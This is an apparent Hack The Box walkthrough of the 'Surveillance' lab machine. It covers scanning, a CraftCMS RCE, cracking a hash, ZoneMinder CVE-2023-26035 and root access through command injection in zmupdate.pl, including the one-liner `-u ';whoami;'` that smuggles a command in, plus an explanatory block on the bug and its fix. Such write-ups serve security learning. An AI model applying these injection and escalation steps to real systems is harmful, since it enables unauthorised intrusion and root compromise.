# Surveillance HTB Walkthrough

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2F4RmVwH1KMFyGkOfyfwgh%2Fimage.png?alt=media&#x26;token=2352aa13-841f-4508-8882-57b4344739ae" alt=""><figcaption></figcaption></figure>

## Reconnaissance

### Scanning

First, I scan the network using **`nmap`**:

```bash
nmap -A -o nmap_scan 10.10.11.245
```

I find two open ports:

```text
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
```

### Website Enumeration

Subsequently, I append the following line to **`/etc/hosts`**:

```text
10.10.11.245    surveillance.htb
```

Upon browsing the website, I see it's running **`CraftCMS 4.4.14`**.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FlIHr8AgetpdpvcoaOMfb%2FUntitled.png?alt=media&#x26;token=048c8c02-2a5d-4eb8-8a6f-a0fee86f8f3b" alt=""><figcaption></figcaption></figure>

## Exploitation

### Website Exploitation

I find a Remote Code Execution (RCE) vulnerability for this version: [Exploit-DB 51918](https://www.exploit-db.com/exploits/51918).

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2Fmsw00wqgSZXW5KfFiMmD%2FUntitled%201.png?alt=media&#x26;token=a5691eed-6f1f-4502-956f-20b32f4110aa" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### **Horizontal privilege escalation**

First, I identify two users:

```text
matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash
```

After digging further, I find a backup file containing an SQL query that adds a user named **`Matthew`**.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2F8we5bGmYKQYOTVunAwEb%2FUntitled%202.png?alt=media&#x26;token=4ab7661d-64b2-494a-817e-2eb52e210ace" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2F24bE72Z4s5l5sMRzkgim%2FUntitled%203.png?alt=media&#x26;token=f693b555-af72-40af-93af-35246082d6db" alt=""><figcaption></figcaption></figure>

I crack the hash using [crackstation.net](https://crackstation.net/):

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FX3OmpW6tNxEWLfHkFAR3%2FUntitled%204.png?alt=media&#x26;token=8cce8b85-be65-46c0-8c31-65f5e63e5b41" alt=""><figcaption></figcaption></figure>

Then I connect over SSH with the recovered password:

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2Fxa3HbS69Kbr4z6HaRqC5%2FUntitled%205.png?alt=media&#x26;token=14f1fd6d-5026-4390-9ffb-a1cd0819de04" alt=""><figcaption></figcaption></figure>

Now, let's see what `zoneminder` is.

***ZoneMinder** is an open-source video surveillance software suite that is designed to monitor, record, and manage multiple IP cameras, webcams, and other video sources. It is commonly used for security surveillance purposes in homes, businesses, and other environments where video monitoring is required.*

I find that there is a website running locally on port 8080:

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FZJ0gFHbuPgVfZcPgGlNI%2FUntitled%206.png?alt=media&#x26;token=093fcec1-1c1a-444c-a5ee-bec4550ee983" alt=""><figcaption></figcaption></figure>

Here it is:

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FuudE75Y0gAsZHtIkHTdQ%2FUntitled%207.png?alt=media&#x26;token=dce36711-c51d-4daa-afab-e3cbc2538ca7" alt=""><figcaption></figcaption></figure>

Using the **`zmc`** command, I determine the version:

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FbpdW7LUVsvbeTmv5NiUF%2FUntitled%208.png?alt=media&#x26;token=4b8febe6-322e-4a9f-a9aa-50d422ba5bc6" alt=""><figcaption></figcaption></figure>

Further investigation uncovers a known RCE exploit, [CVE-2023-26035](https://github.com/heapbytes/CVE-2023-26035.git), affecting ZoneMinder 1.36.32.

1. I use **`socat`** to make the website externally accessible:

```bash
socat TCP-LISTEN:8000,fork TCP:localhost:8080
```

2. Running the exploit:

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FXbj78yLxHak5nFg67zxj%2FUntitled%209.png?alt=media&#x26;token=a6f00d3a-dca7-4aa1-8d1a-ee659053be89" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FsCaMpcBSWqGrXxnO82TZ%2FUntitled%2010.png?alt=media&#x26;token=1f701dce-15fd-4cfb-a2b9-b71b27d58ded" alt=""><figcaption></figcaption></figure>

### **Vertical privilege escalation**

Now it's time to escalate privileges to root. I find that **`zoneminder`** has **`sudo`** access:

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2Fh6p5jzcx1F7bImMR3Ju3%2FUntitled%2011.png?alt=media&#x26;token=2175b5e1-486a-46b7-87ba-272a23df3e3b" alt=""><figcaption></figcaption></figure>

Digging deeper, I find that **`zmupdate.pl`** executes a **`mysql`** command based on user input without validation.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2F2devvJxJpiS40m2vqlVT%2FUntitled%2012.png?alt=media&#x26;token=b5b10ab6-7e87-4b1c-b1f4-2fa962f74e87" alt=""><figcaption></figcaption></figure>
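To make the bug class concrete, here is an added illustration (not ZoneMinder's code and not from the original walkthrough) of why a command string built from user input and re-parsed by a shell is injectable, next to the argv-based form that is not. `fake_mysql` is a hypothetical stand-in for the `mysql` client so the script runs offline; `unsafe_invoke`, `safe_invoke` and `validate_username` are names chosen for this example.

```shell
#!/bin/sh
# Added illustration (not ZoneMinder's code): a shell-built command string
# versus direct argv passing, plus an allowlist check on the username.

# Stand-in for the mysql client so the demo runs offline: it only reports
# the argv it received, which is exactly what we want to inspect.
fake_mysql() {
    printf 'mysql got %d args:' "$#"
    printf ' [%s]' "$@"
    echo
}

# Vulnerable pattern: the caller's values are pasted into a command string
# that a shell then re-parses, so a ';' inside the username terminates the
# mysql command and starts a new one (the same shape as the zmupdate.pl bug).
unsafe_invoke() {
    eval "fake_mysql -u$1 -p$2"
}

# Hardened pattern: the values travel as individual argv entries and no shell
# re-parses them, so ';' is just another character in the username argument.
safe_invoke() {
    fake_mysql "-u$1" "-p$2"
}

# Defence in depth: accept only identifiers that look like database usernames
# (non-empty, letters/digits/underscore), regardless of how they are passed on.
validate_username() {
    case "$1" in
        "") return 1 ;;
        *[!A-Za-z0-9_]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Demo driver with constructed input; ':' is a no-op so the trailing
# '-padmin' fragment is swallowed cleanly instead of erroring.
demo() {
    echo "--- unsafe (shell re-parses the string) ---"
    unsafe_invoke ';echo INJECTED;:' admin
    echo "--- safe (argv passed through) ---"
    safe_invoke ';echo INJECTED;:' admin
}

demo
```

In the unsafe path the stand-in client receives a lone `-u` and the injected `echo` runs as a separate command; in the safe path it receives the whole string as a single argument and nothing else executes. When a script like this is reachable through `sudo`, the only fix that holds is to stop handing untrusted strings to a shell at all, with an allowlist check as the second layer.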

Testing:

```bash
sudo zmupdate.pl --version 1.12 -u ';whoami;' -p admin
```

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FbE0xnXk9WvXiVPNttKr2%2FUntitled%2013.png?alt=media&#x26;token=1cf271ea-ceb6-47bf-993e-dfd7b5e2496c" alt=""><figcaption></figcaption></figure>

It works, so let's get a shell.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FFAjhYNWjvmbPvTyhUZb3%2FUntitled%2014.png?alt=media&#x26;token=74eb581d-eda6-42b4-9a5e-d3df96ef5ceb" alt=""><figcaption></figcaption></figure>

BOOM! We are ROOT

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FKDsHEf4EGH2rZxjeOfom%2FUntitled%2015.png?alt=media&#x26;token=8bb54e31-357d-4d61-986d-f8f8016919ef" alt=""><figcaption></figcaption></figure>
